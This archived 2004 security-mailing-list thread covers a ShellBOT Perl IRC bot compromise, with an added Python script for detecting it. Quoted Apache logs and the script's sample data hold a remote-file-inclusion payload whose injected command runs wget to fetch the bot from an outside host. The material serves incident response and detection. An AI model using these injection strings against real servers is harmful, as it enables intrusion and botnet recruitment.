re: Systems compromised with ShellBOT perl script - part 2

security_at_kemhosting.com
Date: 10/20/04

    Date: Wed, 20 Oct 2004 00:04:36 -0500
    To: incidents@securityfocus.com


    This thread is a couple months old, but I'm having issues with this hack, found
    it in the archives and thought it'd be helpful if I 'resuscitated' it. See
    bottom of email for rest of thread.

    Today, hackers used the ShellBOT perl script to bring down Apache and start up
    their IRC listener. They (somehow) copied it into /tmp and executed it. This
    confuses me because I have my /tmp directory mounted rw,noexec,nosuid. Does
    Perl somehow bypass this?

    While the script was running, I ran lsof and found that it had recursively
    accessed all my (virtual host) httpd logs (probably in an attempt to delete
    its tracks = the reason I can't see how they copied the script into /tmp)
    which are owned by root. This is also confusing since the process the script
    spawned was owned by user apache.

    Some info on my box:
    Redhat ES kernel 2.4.21-9.0.1.ELsmp
    httpd-2.0.46-32.ent
    php-4.3.2-11.ent

    Anyone have any ideas on how this can happen? Mainly the executing of a script
    on a noexec mount! Obviously I'm not a guru, so it's probably something simple
    - so please, share!

    Thanks,
    Ed

    Kirby Angell wrote:

    > Yesterday we noticed a funny looking Apache log entry. It contained:
    >
    > http://www.DOMAIN.com/index.php?id=http://farpador.ubbi.com.br/cmd.txt?&cmd=http://farpador.ubbi.com.br/cmd.txt?&cmd=cd%20/tmp;wget%20http://members.lycos.co.uk/lotsen6k/.egg2
    >
    > in the Referer entry. The actual HTTP request was innocuous, but the
    > Referer entry is not. I have been in contact with the owner of the
    > computer that was the apparent target of the attack and he reports that
    > the "index.php" page properly sanitizes its variables to keep this from
    > working.
    >
    > The attack attempts to trick the server into downloading and running the
    > given perl script, ".egg2" in this case. I retrieved a copy of that
    > script and found it configured to log into an IRC server
    > (irc.mzima.net:6667). Once the script is logged in, it joins the
    > channel "#datalink" and then waits for private messages from its
    > handler. The script can perform limited portscans, denial of service
    > attacks, and can run shell commands as whatever user the compromised web
    > server was running as. The script hides its identity by changing its
    > process name to "[httpd]" so it looks like one of many server threads.
    >
    > I logged into the IRC server and joined the channel to find 62
    > compromised systems listening. Unfortunately I was noticed and now the
    > channel is by invitation only. I have notified as many of the
    > administrators for those systems as could be identified from whois
    > records. I have also notified the operators of the IRC server.
    >
    > The IP address of the system that set off the original inquiry is
    > 63.227.76.25. The admin of one of the compromised boxes has found that
    > same IP address involved in their attack too. The Apache log entries
    > from their system look like this:
    >
    > 63.227.76.25 - - [30/Aug/2004:23:38:57 -0400] "GET /popwin.js HTTP/1.0" 200 195 "http://www.domain.com/aboutus/index.php?page=http://farpador.ubbi.com.br/cmd.txt?&cmd=http://farpador.ubbi.com.br/cmd.txt?&cmd=cd%20/tmp;wget%20http://members.lycos.co.uk/lotsen6k/.egg2" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040626 Firefox/0.9.1"
    > 63.227.76.25 - - [30/Aug/2004:23:38:57 -0400] "GET /images/l2_thinkInsideBox.gif HTTP/1.0" 200 1711 "http://www.domain.com/aboutus/index.php?page=http://farpador.ubbi.com.br/cmd.txt?&cmd=http://farpador.ubbi.com.br/cmd.txt?&cmd=cd%20/tmp;wget%20http://members.lycos.co.uk/lotsen6k/.egg2" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040626 Firefox/0.9.1"
    > 63.227.76.25 - - [30/Aug/2004:23:38:57 -0400] "GET /images/l2topbox.gif HTTP/1.0" 200 2576 "http://www.domain.com/aboutus/index.php?page=http://farpador.ubbi.com.br/cmd.txt?&cmd=http://farpador.ubbi.com.br/cmd.txt?&cmd=cd%20/tmp;wget%20http://members.lycos.co.uk/lotsen6k/.egg2" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040626 Firefox/0.9.1"
    >
    > I would like to find if he used other IPs, but so far I've only had a
    > few responses from admins of the compromised systems. All who responded
    > were happy to provide log entries though.
    >
    > This sort of script shouldn't be terribly difficult to spot. A "netstat
    > -pan | grep 6667" will show its presence while running. Unless some
    > other compromise is used in conjunction with the script, the cracker
    > will not be able to install any sort of rootkit to hide the script's
    > presence.
    >
    > --
    > Thank you,
    >
    > Kirby Angell
    > Get notified anytime your website goes down!
    > http://www.alertra.com
    > key: 9004F4C0
    > fingerprint: DD7E E88D 7F50 2A1E 229D 836A DB5B A751 9004 F4C0

    ----------------------------------------------------------------
    This message was sent using IMP, the Internet Messaging Program.
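Two of the detection ideas raised in this thread (the remote URL and shell command carried in the query string and Referer, and the bot renaming itself to "[httpd]") can be checked mechanically. The script below is an added example written for this archive page; it is not code from either poster. The log lines are constructed from the entries quoted above, the process records are constructed, and all function names (`scan_log`, `suspicious_params`, `masquerading_processes`) are my own.

```python
import re
from urllib.parse import unquote, urlsplit

# Apache "combined" log format:
#   host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Fragments that typically show up when a "cmd=" style parameter carries a shell command.
SHELL_HINTS = ("cd ", "wget ", "curl ", "fetch ", "perl ", ";", "|")


def parse_log_line(line):
    """Split one combined-format line into its fields, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def suspicious_params(url):
    """Return (name, kind) for query parameters whose decoded value is a remote URL
    (a remote file inclusion attempt) or looks like a shell command."""
    hits = []
    query = unquote(urlsplit(url).query)   # decode %20 etc. before inspecting values
    # Split by hand: the injected values contain their own '?' and '=' characters,
    # and parse_qs would also merge the two distinct "cmd=" values.
    for chunk in query.split("&"):
        if "=" not in chunk:
            continue
        name, value = chunk.split("=", 1)
        lowered = value.lower().lstrip()
        if lowered.startswith(("http://", "https://", "ftp://")):
            hits.append((name, "remote-url"))
        elif any(h in lowered for h in SHELL_HINTS):
            hits.append((name, "shell-fragment"))
    return hits


def scan_line(line):
    """Inspect both the request target and the Referer of one log line."""
    rec = parse_log_line(line)
    if rec is None:
        return None
    findings = []
    parts = rec["request"].split()          # e.g. ["GET", "/index.php?id=...", "HTTP/1.0"]
    if len(parts) >= 2:
        findings += [("request", n, k) for n, k in suspicious_params(parts[1])]
    if rec["referer"] not in ("", "-"):
        findings += [("referer", n, k) for n, k in suspicious_params(rec["referer"])]
    return {"host": rec["host"], "time": rec["time"], "findings": findings}


def scan_log(lines):
    """Return only the lines that produced at least one finding."""
    results = (scan_line(l) for l in lines)
    return [r for r in results if r and r["findings"]]


def masquerading_processes(procs):
    """Flag user-space processes whose argv[0] is a bracketed name such as "[httpd]".
    On Linux a genuine kernel thread has an empty cmdline and no readable /proc/<pid>/exe,
    whereas a Perl script that rewrote $0 still has exe pointing at the interpreter.
    procs: iterable of dicts with keys pid, cmdline, exe (exe is None when unreadable)."""
    flagged = []
    for p in procs:
        argv0 = p["cmdline"].split(" ", 1)[0] if p["cmdline"] else ""
        if argv0.startswith("[") and argv0.endswith("]") and p["exe"]:
            flagged.append((p["pid"], argv0, p["exe"]))
    return flagged


# Constructed sample input, modelled on the entries quoted in the thread.
INJECTED = ("http://www.domain.com/aboutus/index.php?page=http://farpador.ubbi.com.br/cmd.txt?"
            "&cmd=http://farpador.ubbi.com.br/cmd.txt?&cmd=cd%20/tmp;wget%20"
            "http://members.lycos.co.uk/lotsen6k/.egg2")
UA = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040626 Firefox/0.9.1"
SAMPLE_LOG = [
    '63.227.76.25 - - [30/Aug/2004:23:38:57 -0400] "GET /popwin.js HTTP/1.0" 200 195 "%s" "%s"' % (INJECTED, UA),
    '10.1.2.3 - - [30/Aug/2004:23:40:01 -0400] "GET /aboutus/index.php?page=contact HTTP/1.1" 200 4096 "http://www.domain.com/" "Mozilla/5.0"',
    '63.227.76.25 - - [30/Aug/2004:23:41:12 -0400] "GET /index.php?id=http://farpador.ubbi.com.br/cmd.txt?&cmd=cd%20/tmp;wget%20http://members.lycos.co.uk/lotsen6k/.egg2 HTTP/1.0" 200 1234 "-" "Mozilla/4.0"',
]
SAMPLE_PROCS = [
    {"pid": 7,    "cmdline": "",                         "exe": None},             # genuine kernel thread
    {"pid": 900,  "cmdline": "/usr/sbin/httpd -k start", "exe": "/usr/sbin/httpd"},
    {"pid": 4242, "cmdline": "[httpd]",                  "exe": "/usr/bin/perl"},  # renamed bot
]

if __name__ == "__main__":
    for r in scan_log(SAMPLE_LOG):
        print(r["host"], r["time"], r["findings"])
    for pid, name, exe in masquerading_processes(SAMPLE_PROCS):
        print("pid %d claims %s but runs %s" % (pid, name, exe))
```

The log scan looks at both the request target and the Referer because, as the quoted entries show, the injection was carried in the Referer of otherwise harmless requests for images and scripts. The process check is a heuristic for a live box: build the records from `/proc/<pid>/cmdline` and `readlink /proc/<pid>/exe`, and anything bracketed that still resolves to a real binary deserves a closer look alongside the `netstat -pan | grep 6667` check suggested above.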
